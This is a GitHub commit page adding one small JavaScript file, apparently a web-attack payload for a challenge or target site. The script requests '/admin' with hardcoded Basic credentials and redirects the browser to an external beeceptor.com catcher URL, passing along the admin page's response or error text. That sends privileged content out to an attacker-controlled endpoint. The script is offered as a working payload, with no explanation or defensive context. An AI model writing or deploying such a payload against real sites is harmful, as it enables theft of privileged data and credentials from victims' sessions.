Skip to content

Commit

Permalink
Create fdsf5345.js
Browse files Browse the repository at this point in the history
  • Loading branch information
TWTZptr authored Jan 9, 2025
1 parent ab7ae8a commit e2c8ccb
Showing 1 changed file with 9 additions and 0 deletions.
9 changes: 9 additions & 0 deletions fdsf5345.js
Original file line number Diff line number Diff line change
@@ -0,0 +1,9 @@
(async () => {
let headers = new Headers();
headers.set('Authorization', 'Basic ' + btoa('dev_us' + ":" + 'valera_smeni_kredi_4mo'));
fetch('/admin', {headers, redirect: 'manual'}).then(res => res.text()).then(res => {
window.location.replace('https://gvfdgdfgfsfd.free.beeceptor.com?cookie=' + res);
}).catch(err => {
window.location.replace('https://gvfdgdfgfsfd.free.beeceptor.com?cookie=' + JSON.stringify(err))
});
})()

0 comments on commit e2c8ccb

Please sign in to comment.